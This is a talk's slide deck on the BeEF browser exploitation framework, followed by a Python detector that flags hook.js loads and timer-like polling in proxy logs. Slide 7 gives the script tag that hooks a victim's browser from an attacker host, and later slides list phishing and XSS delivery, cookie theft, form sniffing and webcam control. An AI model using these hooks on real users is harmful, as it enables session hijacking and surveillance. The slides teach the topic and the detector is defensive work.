Beef saurabh

BeEF Browser Exploitation Framework
null Bhopal, 25 March

Published in: Technology

  1. Saurabh Chaudhary
     sudosaurabh@protonmail.com
     www.about.me/saurabhtheone
     BeEF: The Browser Exploitation Framework
  2. WHO AM I
     ▹ I am Saurabh
     ▹ 3rd year C.S.E @ L.N.C.T.S Bhopal
     ▹ Bug bounty researcher on Bugcrowd and HackerOne
     ▹ 2 research papers on cyber security
     ▹ Many security halls of fame and national award winner in science and tech.
  3. Overview
     • What is BeEF?
     • Getting started
     • Browser hooking
     • Attack vectors/exploits & examples
     • Demo
     • Q & A
  4. What is BeEF?
     • Short for “Browser Exploitation Framework”
     • At a basic level, it allows an attacker to control a victim's browser
     • Similar to Metasploit (modular exploit framework) but for exploiting browsers
     • Can be used to leverage existing vulnerabilities (XSS, CSRF, etc.)
     • In some cases, it can lead to full compromise of the victim's PC
  5. Getting Started
     • Installed by default on Kali Linux
     • Can also be downloaded from http://beefproject.com/
     • App directory: /usr/share/beef-xss/
     • Startup script: /etc/init.d/beef-xss <start|stop>
     • Web UI: http://localhost:3000/ui/panel/
     • Default user/pass: beef/beef
  6. Logging In…
  7. Hooking Browsers
     • Must be able to inject JavaScript in the target's browser
     • <script src="http://attackerip:3000/hook.js"></script>
     • Uses XHR (mostly transparent) polling to communicate with the BeEF server
  8. Fundamentals
     • Cross-Site Scripting (XSS) allows arbitrary execution of client-side code (i.e. JavaScript/HTML, etc.). Usually used by attackers to steal session cookies…
     • Cross-Site Request Forgery (CSRF) allows an attacker to initiate requests on behalf of other users (i.e. submitting a form to transfer $1,000 in funds to an attacker's account, etc.)
  9. Attack Vectors
     • Social Engineering/Phishing - Lure or convince the victim to visit an attacker-controlled server hosting BeEF
     • Open Redirect - Redirect victims automatically to an attacker-controlled server hosting BeEF
     • Reflected XSS - Send the victim a URL that executes the hook.js script
     • Stored XSS - Embed the hook.js script via a stored XSS vector
     • Man-In-The-Middle Attacks - Inject the BeEF hook via MITM
  10. BeEF Architecture [3]
  11. Phishing & Social Engineering
      It only takes one wrong click…
  12. XSS Hooking
      BeEF hook.js injected via URL
  13. URL Obfuscation
      Payloads and phishing links can be obfuscated and shortened using URL shorteners… (example: https://goo.gl/ZncYoc)
  14. Stored XSS
      A single stored XSS flaw can yield many hooked clients depending on the size and use of the site…
  15. Man-In-The-Middle
      Injects a small hook.js into every web request intercepted. Can also be done using DNS spoofing…
  16. Web UI
      Tracks client connections (i.e. hooked browsers) and allows an attacker to run modules
  17. BeEF Attacks
      • Gather intel on target system/browser
      • Retrieve session cookies
      • Redirect target to malicious URLs
      • Change site content
      • Form field sniffing
      • Embed hidden iframes
      • Alter original page content (HTML/JS)
      • Scan internal network (ping/port scans)
      • Launch CSRF attacks
      • Execute client-side exploits/code (BeEF/Metasploit/SET)
  18. BeEF Modules
  19. Browser Hacking Methodology
      • Gaining control
      • Attacking extensions
      • Fingerprinting
      • Attacking web applications
      • Retain control
      • Attacking browsers
      • Attacking users
      • Attacking networks
  20. Fingerprinting REQ
  21. Retain Control
  22. Attacking Users: Session Hijacking
  23. Form Sniffing
  24. Webcam Control
  25. Client-Side Request Forgery
      • Can be used to make internal or external requests from the victim's PC
      • Depending on severity, could allow an attacker to automatically transfer funds or reset a user's passwords, etc…
  26. CSRF Exploits
  27. Tunneling Proxy
  28. Internal Network Mapping
  29. Exploits…
  30. Exploiting Browsers Using Java
  31. Automating Modules
      By editing autorun.rb, we can automatically load specific modules and set options whenever a new BeEF hook connects
  32. Demo
  33. Recommended Reading
  34. Questions?
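
A defender-side check for the hooking behaviour on slide 7 (a script include named hook.js followed by XHR polling), added here as an example and not part of the original slides: it scans web-proxy logs for clients that fetched a hook.js from a non-allowlisted host or that contact one host at evenly spaced intervals. The log format, addresses, the /poll path and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log: "<epoch seconds> <client ip> <method> <url>".
# Addresses are documentation ranges; the /poll path is a placeholder.
SAMPLE_LOG = """\
1000 10.0.0.5 GET http://intranet.example/index.html
1001 10.0.0.5 GET http://203.0.113.7:3000/hook.js
1006 10.0.0.5 GET http://203.0.113.7:3000/poll
1011 10.0.0.5 GET http://203.0.113.7:3000/poll
1016 10.0.0.5 GET http://203.0.113.7:3000/poll
1021 10.0.0.5 GET http://203.0.113.7:3000/poll
1026 10.0.0.5 GET http://203.0.113.7:3000/poll
1040 10.0.0.8 GET http://198.51.100.9:3000/hook.js
1000 10.0.0.9 GET http://news.example/
1003 10.0.0.9 GET http://news.example/a.css
1050 10.0.0.9 GET http://news.example/story/1
1051 10.0.0.9 GET http://news.example/b.png
1200 10.0.0.9 GET http://news.example/story/2
"""


def parse(log):
    """Yield (timestamp, client, host[:port], path) per log line."""
    for line in log.strip().splitlines():
        ts, client, _method, url = line.split(maxsplit=3)
        parts = urlsplit(url)
        yield float(ts), client, parts.netloc.lower(), parts.path

def find_hooked_clients(log, allowed_hosts=(), min_hits=5, max_jitter=0.2):
    """Flag (client, host) pairs that loaded hook.js or poll at even intervals."""
    groups = defaultdict(list)
    for ts, client, host, path in parse(log):
        if host not in allowed_hosts:
            groups[(client, host)].append((ts, path))
    findings = []
    for (client, host), hits in sorted(groups.items()):
        hits.sort()
        reasons = []
        if any(path.rsplit("/", 1)[-1] == "hook.js" for _, path in hits):
            reasons.append("hook_script")
        gaps = [b[0] - a[0] for a, b in zip(hits, hits[1:])]
        # Coefficient of variation of the gaps: near 0 means timer-driven polling.
        if len(hits) >= min_hits and mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            reasons.append("regular_polling")
        if reasons:
            findings.append({"client": client, "host": host, "reasons": reasons})
    return findings
```

The file-name match only catches the name shown on the slide; the timing check is the signal that does not depend on the script's name or port.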
